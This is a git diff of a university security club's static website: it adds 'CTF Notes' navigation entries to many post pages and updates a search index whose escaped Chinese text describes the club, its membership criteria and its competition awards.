+++ b/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html b/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html
index 5d6027d..c346fcd 100755
--- a/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html
+++ b/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html b/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html
index d90d0b1..ad32ae4 100755
--- a/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html
+++ b/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html b/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html
index 17665bd..c92c352 100755
--- a/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html
+++ b/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html b/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html
index 6f3d98f..26d15cd 100755
--- a/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html
+++ b/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html b/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html
index 4783f32..520b834 100755
--- a/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html
+++ b/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html b/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html
index d7f3779..e95e592 100755
--- a/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html
+++ b/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -679,6 +695,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html b/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html
index 2b301e3..bbc9e02 100755
--- a/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html
+++ b/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html b/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html
index 7b01eff..5d06a00 100755
--- a/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html
+++ b/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html b/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html
index 8a8d6d1..52e0c38 100755
--- a/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html
+++ b/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html b/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html
index e455d4e..611d305 100755
--- a/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html
+++ b/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html b/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html
index 4ea3ceb..b2f9f4c 100755
--- a/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html
+++ b/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html
@@ -18,6 +18,8 @@
+
+
@@ -227,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -646,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/search/search_index.json b/search/search_index.json
index 7c55937..5d24c1d 100755
--- a/search/search_index.json
+++ b/search/search_index.json
@@ -1 +1 @@
-{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002
\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn
"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63
\u5bf9\u8ba1\u7b97\u673a\u5b89\u5168\u6709\u7740\u6d53\u539a\u7684\u5174\u8da3
\u5bf9\u65b0\u4e8b\u7269\u6709\u7740\u5f3a\u70c8\u7684\u63a2\u7d22\u6b32\u671b
\u80fd\u591f\u5b8c\u6210\u6211\u4eec\u51fa\u7684\u65b0\u751f\u8d5b\u9898\uff08\u6821\u8d5b\uff09
\u80fd\u72ec\u7acb\u89e3\u51b3\u4e00\u9898\u5927\u578bCTF\u7ade\u8d5b\u7684\u9898
\u9ad8\u4e2d\u81ea\u5b66\u7b97\u6cd5\u6216\u53c2\u52a0\u8fc7\u7b97\u6cd5\u7ade\u8d5b
\u7834\u89e3\u8fc7\u67d0\u4e9b\u8f6f\u4ef6
\u5728CNVD\u3001EDUSRC\u3001HackerOne\u3001\u8865\u5929\u3001360\u3001\u963f\u91cc\u4e91\u5148\u77e5\u3001\u6216\u8005\u5728\u4f01\u4e1aSRC\uff08\u534e\u4e3a\u3001\u817e\u8baf\u3001B\u7ad9\uff09\u53d1\u8868\u6587\u7ae0\u6216\u8005\u6316
\u6398\u5e76\u63d0\u4ea4\u6f0f\u6d1e\u62a5\u544a
\u72ec\u81ea\u7814\u7a76\u8fc7\u53ef\u4fe1\u6280\u672f\u3001\u91cf\u5b50\u5b89\u5168\u3001\u4eba\u5de5\u667a\u80fd\u5b89\u5168\u3001\u5de5\u4e1a\u63a7\u5236\u5b89\u5168
\u2026\u6216\u662f\u5176\u4ed6\u4efb\u4f55\u548c\u4fe1\u606f\u5b89\u5168\u6709\u5173\u7684\u4e8b\u60c5\u3002
"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":" \u7ebf\u4e0a\u81ea\u5b66
\u534f\u4f1a\u5b66\u4e60\u5e73\u53f0\uff1ahttps://cloud.xmutsec.cn
\u5b66\u4e60\u8d44\u6599\uff1ahttps://ctf-wiki.github.io/ctf-wiki/
\u5237\u9898
\u901b\u5927\u4f6c\u4eec\u7684\u535a\u5ba2
\u575a\u6301
\u575a\u6301
\u575a\u6301
\u534f\u4f1a\u7f51\u76d8\u91cc\u62e5\u6709\u5b66\u4e60\u7f51\u7edc\u5b89\u5168\u7684\u6240\u6709\u8d44\u6599\uff0c\u5927\u5bb6\u53ef\u81ea\u884c\u4e0b\u8f7d\u5b66\u4e60\uff0c\u5982\u9047\u5230\u56f0\u96be\u53ef\u5148\u81ea\u884c\u89e3\u51b3\uff08\u6ce8\u610f\u7ffb\u9605\u300a\u63d0\u95ee\u7684\u667a\u6167\u300b\uff09\uff0c\u89e3\u51b3\u4e0d\u4e86\u7684\u5728\u5411\u5b66\u957f\u6216\u5b66\u59d0\u53d1\u8d77\u63d0\u95ee\uff0c\u7406\u5de5\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6b22\u8fce\u5168\u6821\u540c\u5b66\u7684\u5230\u6765\uff0c\u534f\u4f1a\u6bcf\u5b66\u671f\u4f1a\u4e3e\u529e\u4e00\u573a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff0c\u7528\u4e8e\u6218\u961f\u9009\u62d4\uff0c\u83b7\u5f97\u5956\u9879\u7684\u540c\u5b66\u5373\u53ef\u52a0\u5165XMUTSEC\u6216CodeMonster\u6218\u961f\uff0c\u53c2\u4e0e\u5b66\u672f\u7ade\u8d5b\u548c
"},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":" [2022\u5e7411\u670819\u65e5] - 2022\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2022\u5e7409\u670806\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b\u4e2d\u83b7\u4e09\u7b49\u5956
[2022\u5e7407\u670807\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u534e\u4e1c\u5357\u5206\u533a\u8d5b\u4e2d\u559c\u83b7\u4f73\u7ee9
[2021\u5e7412\u670811\u65e5] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2019\u5e7409\u670816\u65e5] - \u6211\u9662\u5b66\u5b50\u57282019\u5e74\u201c\u9ed1\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u77e5\u8bc6\u548c\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\u83b7\u5168\u7701\u4e9a\u519b
[2018\u5e7412\u670819\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u56db\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e8c\u540d
[2018\u5e7412\u670810\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u6211\u9662\u5b66\u5b50\u57282017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u53d6\u5f97\u4f18\u5f02\u6210\u7ee9
[2017\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e09\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u56e2\u961f\u5728\u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u4e2d\u52c7\u593a\u5168\u7701\u7b2c\u4e8c\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u4fe1\u606f\u5b89\u5168\u56e2\u961f\u5728\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u83b7\u4f73\u7ee9
[2017\u5e7405\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\u5706\u6ee1\u843d\u5e55
[2017\u5e7405\u670807\u65e5] - \u6211\u9662\u987a\u5229\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u4fe1\u606f\u5b89\u5168\u6821\u8d5b\u603b\u51b3\u8d5b
[2017\u5e7404\u670828\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u4e2d\u559c\u83b7\u5b63\u519b
[2016\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u559c\u83b7\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4f73\u7ee9
"},{"location":"award/#_3","title":"\u4e3b\u529e","text":" [2022/11/04] - 2022\u5e74 SkyNICOCTF \u66a8\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2022/05/??] - 2022\u5e74CMCTF-5\uff08AWD\uff09\u7ebf\u4e0a\u653b\u9632\u5bf9\u6297\u8d5b [2022/04/??] - 2022\u5e74CMCTF-4\uff08CTF\uff09\u6bd4\u8d5b [2021/10/??] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2018/??/??] - 2018\u5e74\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b [2018/02/13] - \u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u2642\u2642\u2642 [2017/05/06] - \u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b "},{"location":"award/#2023","title":"2023","text":" [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b \u4e00\u7b49\u5956\uff08\u7b2c5\u540d\uff09 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5de5\u63a7\u5b89\u5168\u6311\u6218\u521b\u65b0\u5355\u9879\u5956 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/04] - 2023\u5e74\u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\u51b3\u8d5b \u5730\u70b9\uff1a\u91cd\u5e86\uff0c\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2023/06/27] - \u7b2c\u4e09\u5c4a\u4e2d\u56fd\uff08\u6c88\u9633\uff09\u667a\u80fd\u7f51\u8054\u6c7d\u8f66\u5927\u8d5b\u51b3\u8d5b\uff08\u667a\u80fd\u7f51\u8054\u6c7d\u8f66 \"\u5929\u878d\u4fe1\u676f\" \u4fe1\u606f\u5b89\u5168\u653b\u9632\u8d5b\uff09\u521d\u8d5b12\u540d \u5730\u70b9\uff1a\u6211\u89c9\u5f97\u4e3b\u529e\u65b9\u5f88\u6709\u5fc5\u8981\u5b66\u4e60\u4e00\u4e0b\u5dee\u65c5\u662f\u4ec0\u4e48\u610f\u601d\uff0c\u673a\u7968\u592a\u8d35\u98de\u4e0d\u4e86\u6c88\u9633 [2023/06/24] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\uff08\u534e\u4e1c\u5357\u5206\u533a\u9009\u62d4\u8d5b\uff09\uff0c\u56e2\u4f53\u4e00\u7b49\u5956\uff08\u664b\u7ea7\u603b\u51b3\u8d5b\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/06/03] - 2023\u5e74\u798f\u5efa\u7701\u7b2c\u56db\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u5168\u56fd\u5927\u5b66\u751f\u8d5b\u9053\uff09\u521d\u8d5b\u5168\u7701\u7b2c\u4e00/\u51b3\u8d5b\u4e09\u7b49\u5956\uff08\u4e0b\u534a\u573a\u5165\u573a\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/05/xx-06-xx] - \u67d0\u884c\u52a8\uff0c\u4fdd\u5bc6 [2023/05/29] - 2023\u5e74\u7b2c\u516b\u5c4a\u4e0a\u6d77\u5e02\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u66a8\u201c\u78d0\u77f3\u884c\u52a8\u201d2023\uff08\u9996\u5c4a\uff09\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u653b\u9632\u8d5b \u7b2c24\u540d \u5730\u70b9\uff1a\u80fd\u8fdb\u7ebf\u4e0b\uff0c\u4f46\u7ecf\u8d39\u4e0d\u591f\uff0c\u6240\u4ee5\u5c31\u6ca1\u53bb\u4e86\uff08 [2023/05/06] - 2023\u5e74\u9996\u5c4a\u201c\u76d8\u53e4\u77f3\u676f\u201d\u5168\u56fd\u7535\u5b50\u6570\u636e\u53d6\u8bc1\u5927\u8d5b \u7b2c61\u540d\uff08\u5dee1\u540d\u8fdb\u7ebf\u4e0b\uff09 \u5730\u70b9\uff1a\u7ebf\u4e0a\uff0c\u5982\u679c\u8fdb\u7684\u8bdd\u5c31\u80fd\u53bb\u5357\u4eac\u4e86\uff0c\u8fd9\u6ce2\u662f\u8bbe\u5907\u95ee\u9898 [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b\uff0838/50\uff0cCodeMonster\uff09\uff0cx1aoB1n \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u534a\u51b3\u8d5b\uff0813/109\u540d\uff0cCodeMonster\uff09\uff0c\u664b\u7ea7\u603b\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/01/10] - 2023\u5e74\u7b2c\u56db\u5c4a\u201c\u957f\u57ce\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e00\u8d5b\u533a\uff0c\u56e2\u4f53\u4e09\u7b49\u5956 \uff08FUCK U, COVID-19/\ud83d\udc47\uff09
"},{"location":"award/#2022","title":"2022","text":" [2022/10/??] - 2022\u5e74\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u5ba3\u4f20\u5468\u798f\u5efa\u7701\u7b2c\u4e09\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u8d5b\u9053\uff09 \u4f18\u79c0\u5956\uff08CodeMonster/XMUTSEC\uff09 \u5730\u70b9\uff1a\u798f\u5dde [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u4e2a\u4eba\u91d1\u724c \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u7ebf\u4e0a [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u56e2\u4f53\u4e8c\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] - \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u2014\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u603b\u51b3\u8d5b \u56e2\u4f53\u4e09\u7b49\u5956 \u7ebf\u4e0a [2022/06/28] - \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b \u534e\u4e1c\u5357\u8d5b\u533a \u56e2\u4f53\u4e00\u7b49\u5956 \u7ebf\u4e0a "},{"location":"award/#2021","title":"2021","text":" [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u6559\u80b2\u884c\u4e1a\u653b\u9632\u8d5b\u9053\uff0c\u9632\u5b88\u65b9\u7b2c\u4e00\u540d \u7ebf\u4e0a [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u9ed1\u76fe\u8d5b\u9053\uff0c\u9ad8\u6821\u7ec4\u7b2c\u4e09\u540d\u3001\u7b2c\u4e09\u540d \u5730\u70b9\uff1a\u798f\u5dde \uff08FUCK U, COVID-19/\ud83d\udc46\uff09
"},{"location":"award/#2020","title":"2020","text":" [2020/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e00\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2020/??/??] - \u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde "},{"location":"award/#2019","title":"2019","text":" [2019/??/??] - X-NUCA \u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b \u7b2c 23 \u540d [2019/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u7701\u8d5b \u4e00\u7b49\u5956 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e09\u7b49\u5956 